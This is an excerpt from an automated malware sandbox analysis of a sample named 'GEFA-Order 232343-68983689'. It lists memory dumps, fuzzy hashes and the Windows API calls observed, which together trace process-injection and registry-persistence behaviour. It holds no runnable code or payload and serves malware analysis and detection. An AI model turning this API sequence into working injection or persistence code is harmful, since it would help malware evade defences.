                                                              • Instruction Fuzzy Hash: 0CF10570E05229CFEBA4CF69D844BA9BBF2BF89340F1081AAD41DA7255DB705D88CF41

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: y-3|
                                                              • API String ID: 0-2856238494
                                                              • Opcode ID: acbfe229c53a5fd33d60850ee9b5176074eef7cf0e7c0f2f25bb901f0725adb4
                                                              • Instruction ID: f7ca9159f6effaabbda1395e382387c85774cf32e6e27636fc9890b42836910c
                                                              • Opcode Fuzzy Hash: acbfe229c53a5fd33d60850ee9b5176074eef7cf0e7c0f2f25bb901f0725adb4
                                                              • Instruction Fuzzy Hash: B1F1E474E01229CFEBA4CF69D844B99BBF2BF89340F1081AAD419A7355DB745D88CF41
                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06F17469
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2706961497-0
                                                              • Opcode ID: f6c3e3226915bb711ce81f0a70a2dca5da3d0750981687605b6e0c85747b46fd
                                                              • Instruction ID: 0ab7780320c443b28c04aafed12e4157a4439aa900e158acae85b55527f0970e
                                                              • Opcode Fuzzy Hash: f6c3e3226915bb711ce81f0a70a2dca5da3d0750981687605b6e0c85747b46fd
                                                              • Instruction Fuzzy Hash: FB2122B1D013499FDB10DFAAD880ADEFBF5FF48310F24842AE519A7240C775AA14CBA1
                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06F17469
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2706961497-0
                                                              • Opcode ID: fd5fb8dc797410cea68f28443fca2f5c128b9d986e55498eeca0ac5a4f40f524
                                                              • Instruction ID: a191470c58575bd5e7dbbd5548688b03ac92aacd032cc4c42bc46a3dc1f23aa1
                                                              • Opcode Fuzzy Hash: fd5fb8dc797410cea68f28443fca2f5c128b9d986e55498eeca0ac5a4f40f524
                                                              • Instruction Fuzzy Hash: CE21FFB1D003499FDB10DFAAD884ADEFBF5FF48310F24842AE519A7240C775A904CBA1
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 06F18426
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 8fac7667db6a4d9c8009bcd152ce8e512a4fb3392a92cd9c03cd19f6f9c663f9
                                                              • Instruction ID: 9b5cbcc7d4f744ad876623ce4ae82a006b9dce5644b4330615d4d2379cd8fcb9
                                                              • Opcode Fuzzy Hash: 8fac7667db6a4d9c8009bcd152ce8e512a4fb3392a92cd9c03cd19f6f9c663f9
                                                              • Instruction Fuzzy Hash: B11136B1D003098FDB10DFAAC4847EEFBF4BF88250F54842AD559A7240CB796945CFA5
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 06F18426
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 67bc7cfd61214d50575e576b9dd64103c28c12686cc5786048d646908f892a83
                                                              • Instruction ID: 18875da397ae2208d72d3e6583a4e2ea6a97005e9c6eae64e7fa594f336dd908
                                                              • Opcode Fuzzy Hash: 67bc7cfd61214d50575e576b9dd64103c28c12686cc5786048d646908f892a83
                                                              • Instruction Fuzzy Hash: 191103B1D003098FDB10DFAAC4847AEFBF8BF48210F54842AD419A7240CB79A944CFA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: N)
                                                              • API String ID: 0-4241560727
                                                              • Opcode ID: 3729ea424be42c5ca27e88c907352911a199e725f6097902a729ddc9655647ef
                                                              • Instruction ID: 600092dbb3821fa7e3ace09bbcebec4d7facd6bc971082ef86ea12be7f1cf2f9
                                                              • Opcode Fuzzy Hash: 3729ea424be42c5ca27e88c907352911a199e725f6097902a729ddc9655647ef
                                                              • Instruction Fuzzy Hash: 0EB1F070E06218CFEB54CFA9D858BADBBF2BB49340F1091A9D409AB291CB755E85CF41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: N)
                                                              • API String ID: 0-4241560727
                                                              • Opcode ID: af09626fea246e917a0e9446291590849026c935ebd6a46e314cbba3c3d742ec
                                                              • Instruction ID: c18856ca5bd321ff5c51d79cc54394e16dfbe8844a874fad3c31da6c9284fadc
                                                              • Opcode Fuzzy Hash: af09626fea246e917a0e9446291590849026c935ebd6a46e314cbba3c3d742ec
                                                              • Instruction Fuzzy Hash: EBB1F270E06318CFEB54CFA9D858BADBBF2BB49340F1091A9D409AB291CB755E85CF41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !
                                                              • API String ID: 0-2657877971
                                                              • Opcode ID: 4bda84f00fbb4851e5402442b6cafc8c6fe80509286b90ce4bb9aff359e9cdcc
                                                              • Instruction ID: 070909a632cadf7ca8f8eacb38d46c66d800a5b38fbaaf78a9e1347f9b4d48e5
                                                              • Opcode Fuzzy Hash: 4bda84f00fbb4851e5402442b6cafc8c6fe80509286b90ce4bb9aff359e9cdcc
                                                              • Instruction Fuzzy Hash: A0C1E674A45228CFDBA4DF18D898BE9B7F2BF49300F1081E9D509A7261DB719E81CF45
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: N)
                                                              • API String ID: 0-4241560727
                                                              • Opcode ID: e074507914b9fbc8c0fe244a9897ebd7f65b52bac22a616db13df3d09a64753c
                                                              • Instruction ID: f1f7b8be76c61a14ece93a39d732fe236b2c1a47d0595b11c16c7b0cd457c3bf
                                                              • Opcode Fuzzy Hash: e074507914b9fbc8c0fe244a9897ebd7f65b52bac22a616db13df3d09a64753c
                                                              • Instruction Fuzzy Hash: DAB1E274E06218CFEB54DFA8D848BADBBF2FB49340F1091A9D409AB291CB755E85CF41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: h
                                                              • API String ID: 0-2439710439
                                                              • Opcode ID: c933e2263d965e798154b5c74bf5a56b9d65c8b27d693ed5a9f72ea9597cdd40
                                                              • Instruction ID: 67903ae5bcc9d52f7d56875e3dad4268715f3e0e3e668420052214bcff54513b
                                                              • Opcode Fuzzy Hash: c933e2263d965e798154b5c74bf5a56b9d65c8b27d693ed5a9f72ea9597cdd40
                                                              • Instruction Fuzzy Hash: FF61C571D016298BEB64DF6AC850BD9BBF2BF89310F14C2AAD50DB7250DB305A85CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa01828ab78a000ce027c964f0df294a6435f2e981dfd9fa7d7d073b5108a2e5
                                                              • Instruction ID: 689a2ca9bad02720dde050d98125e8342716085b9acd824110381d694140bf9b
                                                              • Opcode Fuzzy Hash: fa01828ab78a000ce027c964f0df294a6435f2e981dfd9fa7d7d073b5108a2e5
                                                              • Instruction Fuzzy Hash: 68A29375A00228DFDB65DF69C984AD9BBB2FF89300F1581E9D509AB321DB319E81CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4226fc885f52aba6a61f3af7290e2cb994253c8ac8bd17fadaa3dcec906c3c80
                                                              • Instruction ID: a7e1ce5a43f7493ceb54da5f154d0b09e9eb482280dfea695e8bc57535573058
                                                              • Opcode Fuzzy Hash: 4226fc885f52aba6a61f3af7290e2cb994253c8ac8bd17fadaa3dcec906c3c80
                                                              • Instruction Fuzzy Hash: F0427870E047158FDB58DFAAC494B6EBBF2BF88300F248529D59AD7390DB30A941CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1f398eb68adc65278873f2df64cf5ccba7d0ae9d6d776e796ab62d56c9d20d02
                                                              • Instruction ID: 3bec3e5bcb6562b576ab1cb86796c30c4545e20c22b9687d196a839e6988a5be
                                                              • Opcode Fuzzy Hash: 1f398eb68adc65278873f2df64cf5ccba7d0ae9d6d776e796ab62d56c9d20d02
                                                              • Instruction Fuzzy Hash: 0C329F74A442298FDBA5DF28D984BA9B7B6FF48300F1081E9D94DA7355DB30AE81CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: acc11ec2e9ac0cbc6c55813fb5c1d6f099dab1957b543c4c48c46f20ac7b1b9e
                                                              • Instruction ID: ab5c728cd21aae7d4f9b8e4931932eafdcc9b5c3f93f4472d19844170b00a877
                                                              • Opcode Fuzzy Hash: acc11ec2e9ac0cbc6c55813fb5c1d6f099dab1957b543c4c48c46f20ac7b1b9e
                                                              • Instruction Fuzzy Hash: 1F1273B04037458EE320EF65ED4C1897BF1BB86319B905209DE612B2EDDBBC156ACF64
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 642917f31c51b0f166ace167e311108c9a006db17057571c1b62dc82131e730f
                                                              • Instruction ID: a774f00a90eed51b28efe078db9afb45950e6050a0d2a4fb30a8ac3c62d8297f
                                                              • Opcode Fuzzy Hash: 642917f31c51b0f166ace167e311108c9a006db17057571c1b62dc82131e730f
                                                              • Instruction Fuzzy Hash: F0E11474E00218CFDB94DFA9D848BAEBBF2FF49300F108169D509AB255DB785985CF84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 60a27ae9b8d7649fc683b555fcfafab90d5fba846264224185c26b4f2bff8e86
                                                              • Instruction ID: 2992f5fc2d8f15b900c06c63c9ae1cde76dd13c3eeb81400c7708724aa4d0c1c
                                                              • Opcode Fuzzy Hash: 60a27ae9b8d7649fc683b555fcfafab90d5fba846264224185c26b4f2bff8e86
                                                              • Instruction Fuzzy Hash: ADE10474E00218CFDB94DFA9D848BAEBBF2FF49310F108169D509AB255DB785985CF84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410817108.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c9e06558cb393aa7c7d2a334c5780a3750048404e3a09009f505dad3a4ec466b
                                                              • Instruction ID: c00f53ab016bca4d87ac0fcdaca02065babf02e169fc76145feaa6d231ca7065
                                                              • Opcode Fuzzy Hash: c9e06558cb393aa7c7d2a334c5780a3750048404e3a09009f505dad3a4ec466b
                                                              • Instruction Fuzzy Hash: 72D1A274A10218CFDB58DFA9D994A9DBBB2FF88300F1081A9D409AB365DB75AD81CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$>
                                                              • API String ID: 0-3953377423

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2$6
                                                              • API String ID: 0-3875314899

                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06F17BC2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0

                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06F17BC2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 030BAB7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0

                                                              APIs
                                                              • CopyFileA.KERNEL32(?,?,?), ref: 06F199DD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID:
                                                              • API String ID: 1304948518-0

                                                              APIs
                                                              • CopyFileA.KERNEL32(?,?,?), ref: 06F199DD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID:
                                                              • API String ID: 1304948518-0

                                                              APIs
                                                              • RegSetValueExA.KERNEL32(?,?,?,?,00000000,?), ref: 06F19DAA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0

                                                              APIs
                                                              • RegSetValueExA.KERNEL32(?,?,?,?,00000000,?), ref: 06F19DAA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0

                                                              APIs
                                                              • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 06F19BCB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              APIs
                                                              • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 06F19BCB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410817108.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F18176
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F18298
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F18298
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030BCEE6,?,?,?,?,?), ref: 030BCFA7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F17D66
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030BCEE6,?,?,?,?,?), ref: 030BCFA7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F17D66
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06F1866C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06F1866C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 030B949D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F18176
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
